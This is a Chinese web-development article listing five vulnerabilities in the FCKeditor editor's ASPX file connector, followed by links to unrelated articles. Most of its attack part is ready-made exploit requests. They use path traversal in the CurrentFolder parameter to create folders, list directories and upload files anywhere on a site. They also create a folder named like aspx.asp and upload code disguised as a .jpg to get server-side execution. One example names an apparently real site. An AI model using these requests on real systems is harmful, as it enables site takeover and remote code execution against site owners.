首页
网页制作
网络编程
脚本专栏
数据库
网站运营
网络安全
平面设计
CMS教程
搜索
建站极客
网络编程
网页编辑器
正文
FCKeditor 新闻组件的一些程序漏洞
所属分类:
网络编程
/
网页编辑器
阅读数: 1737
收藏 0
赞 0
分享
1 CurrentFolder 参数,可以在网站中不同目录新建文件夹,参数使用 ../../来篡改参数,进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
2 CurrentFolder 参数,根据返回的XML信息可以查看网站所有的目录,比如 “../../../”进入不同的目录,让后通过XML返回的消息就可以看到没有权限的页面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3 上传文件时,通过修改CurrentFolder参数,可以将文件上传到不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
4 同时修改Type 和CurrentFolder 参数,可以上传任意类型文件到网站任意目录,基本上网站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp
5 通过创建文件夹的功能,创建名字带有.aspx的文件夹,如:file.aspx等,利用文件解析漏洞,在该文件夹下上传有代码的.jpg 或.rar等文件(实际文件是.aspx,把文件名该后缀),上传之后就可以利用漏洞执行代码了。 如:www.xxx.com/upload/file.aspx/123.jpg 输入之后,代码被成功执行。
更多精彩内容
其他人还在看
为SyntaxHighlighter添加新语言的方法
因为经常要在博客里贴一些Lua代码,但是所使用的SyntaxHighlighter插件默认不支持Lua语言,所以去研究了一下如何为SyntaxHighlighter添加并激活一个新的语言,这里将过程和有同样需求的童鞋分享
评论 0
收藏 0
赞 0
分享
syntaxhighlighter 去掉右上角问号图标的三种方法
syntaxhighlighter可以高亮着色显示几乎所有语言形式的源代码,还可以显示行号,是一款深受网站建设人员喜爱的工具,并且它还是免费的
评论 0
收藏 0
赞 0
分享
百度编辑器ueditor前台代码高亮无法自动换行解决方法
这两天本站成功安装整合了百度编辑器ueditor,用着还挺不错,但是遇到了点小问题
评论 0
收藏 0
赞 0
分享
FCKeditor 在chrome中不显示问题
今天在使用chrome打开后台的时候,发现FCKeditor编辑器菜单等都不显示,chrome确实不适合后台使用,以后还是继续ie核心的吧
评论 0
收藏 0
赞 0
分享
ie9后浏览器fckeditor无法上传图片、弹出浮层内容不显示的解决方法
升级到IE9后,fckeditor在IE9里的弹出浮动层会出现bug,里面的内容不会出现。原因是IE9不支持var $=document.getElementById;这样的写法了
评论 0
收藏 0
赞 0
分享
FCKeditor编辑器添加图片上传功能及图片路径问题解决方法
现在很多CMS系统因为安全原因会把后台编辑器里的上传功能给去除,但这样一来对实际使用过程造成了很多麻烦,今天我们以ASPCMS系统的FCKeditor编辑器为例,说明一下如何增加图片上传功能
评论 0
收藏 0
赞 0
分享
CKEditor/FCKEditor 使用FCKeditor 2.6.5 快速使用教程(含插入图片)
CKEditor 是著名的 HTML 编辑器,IBM、Oracle、Adobe 等都在用。CKEditor 创建于 2003 年,其前身为 FCKEditor,在 2009 年的时候把“F”去掉了,更名为 CKEditor。
评论 0
收藏 0
赞 0
分享
CKEditor/FCKEditor 使用 CKeditor 3.0.1 快速使用教程(含插入图片)
一般来说,我们在编辑内容时,先是读入到 textarea,再将 textarea 的内容赋给编辑器。
评论 0
收藏 0
赞 0
分享
FCKEditor 自定义用户目录的修改步骤 (附源码)
FCKEditor 自定义用户目录的修改步骤 (附源码) ,需要的朋友可以参考下。
评论 0
收藏 0
赞 0
分享
FCKeidtor 清除编辑器内容的代码
FCKeidtor清除编辑器内容的代码,需要的朋友可以参考下。
评论 0
收藏 0
赞 0
分享
查看更多
网络赚钱
更多
淘宝客服退款竟是诈骗新招 南昌网友17.5万元险被骗走
怎么用互联网思维的做餐饮?
不靠网络广告,站长收益从何来?
做什么样的网站能赚钱?
SEO赚钱之道:11种可以让你盈利的SEO实业方法
企业网站通过流量变现有哪些关键的环节需要注意?
站长故事
更多
为什么被黑的总是小米?
草根站长网站运营:运气创业,勤能过日子
探讨:为什么个人站长越来越不愿做seo独立博客
我是怎么赚到人生的第一个百万的
职场中12种经典实用的管理方法和工具
90后男子新婚杀妻后将照片发朋友圈续:被判死缓